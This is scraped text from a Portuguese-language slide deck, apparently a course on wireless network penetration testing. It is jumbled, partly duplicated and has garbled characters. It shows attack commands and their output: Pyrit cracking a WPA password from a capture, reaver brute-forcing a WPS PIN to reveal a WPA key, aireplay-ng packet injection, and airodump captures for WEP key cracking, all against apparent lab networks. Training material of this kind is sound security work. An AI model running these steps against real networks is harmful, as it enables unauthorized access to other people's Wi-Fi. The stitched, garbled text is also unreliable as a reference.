Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
Parsing file 'dlink-01.cap' (1/1)...

Parsed 19 packets (19 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.

Tried 109216 PMKs so far; 1870 PMKs per second.
The password is ’pxxxxxxxxxxxxx'.
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Running benchmark (1239.9 PMKs/s)... \
Computed 1239.93 PMKs/s total.

#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
Pyrit
pyrit benchmark
Running benchmark (1239.9 PMKs/s)... \

pyrit benchmark
Pyrit 0.4.1-dev
#4: 'CPU-Core (svn
(SSE2)': r308)PMKs/s
331.3 (C) 2008-2011
(RTT 3.1) Lukas Lueg http://pyrit.googlecode.com
Running benchmark (1880.5 PMKs/s)... /

#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
Ataque ao WPS
Ataque ao WPS
WiFi Protected Setup

Recuperar configuração
PIN
Reconfigurar AP

Registrar
PIN
# wash -‐i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Heffner
<cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
48:5B:39:B0:2D:2C 3 -‐54 1.0 No LABVIRUS
# reaver -‐i mon0 -‐b 48:5B:39:B0:D0:2C -‐v

Reaver v1.4 WiFi Protected Setup Ahack Tool
Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Heffner
<cheffner@tacnetsol.com>

[+] Wai_ng for beacon from 48:5B:39:B0:D0:2C
[+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: ’labvirus2013'
[+] AP SSID: ’LABVIRUS'
Dúvidas?
Perguntas?
Crí_cas?
Sugestões?
Siga a Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Muito Obrigado!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurança da Informação

Clavis Teste de Invasao Sem Fio EAD PDF

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Clavis Teste de Invasao Sem Fio EAD PDF

Enviado por

Direitos autorais:

Formatos disponíveis

Teste

de Invasão em

• Aulas ao vivo (on line)

wlan4 IEEE 802.11bgn ESSID:off/any

eth4 no wireless extensions.

$ iwlist wlan0 freq

((( Nome da rede )))

((( Nome da rede )))

# iwlist wlan0 scan | egrep "Address|ESSID"

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

# tcpdump -vv -c 3 -i wlan0

# iw wlan0 info

# iwconfig wlan0 mode monitor

# tcpdump -c 3 -i mon0 -vv

# iwconfig mon0 channel 11

# tcpdump -c 3 -i mon0 -vv

CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

BSSID STATION PWR Rate Lost Frames Probe

grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt

• Quebra exige captura de grande número de pacotes (+5mil)

• Várias ferramentas disponíveis

CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS

• Quebra de chave WEP (vários _pos de ataques)

• Injeção de pacotes

• Quebra de chave WPA(2)-­‐PSK usando dicionário

• Criação de Access Point falso

• Airodump-­‐ng: Visualização e captura de pacotes

• Aircrack-­‐ng: Quebra da chave WEP

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb -

wlan2 Realtek RTL8187L rtl8187 - [phy51]

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

# airmon-ng start wlan5

wlan2 Realtek RTL8187L rtl8187 - [phy51]

wlan2 Realtek RTL8187L rtl8187 - [phy51]

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,

CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 -1 3 9 LABVIRUS

# aireplay-ng --test mon0

17:33:52 Trying directed probe requests...

# aireplay-ng --arpreplay –h mac_cliente –e ESSID interface

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS

# airmon-ng start wlan5 11

wlan2 Realtek RTL8187L rtl8187 - [phy51]

•  Aulas ao vivo (on line)

•  Quebra exige captura de grande número de pacotes (+5mil)

•  Várias ferramentas disponíveis

•  Quebra de chave WEP (vários _pos de ataques)

•  Injeção de pacotes

•  Quebra de chave WPA(2)-‐PSK usando dicionário

•  Criação de Access Point falso

•  Airodump-‐ng: Visualização e captura de pacotes

•  Aircrack-‐ng: Quebra da chave WEP

•  Esperar uma nova conexão

•  Forçar uma desconexão

cowpahy 4.6 -‐ WPA-‐PSK dic_onary ahack. <jwright@hasborg.com>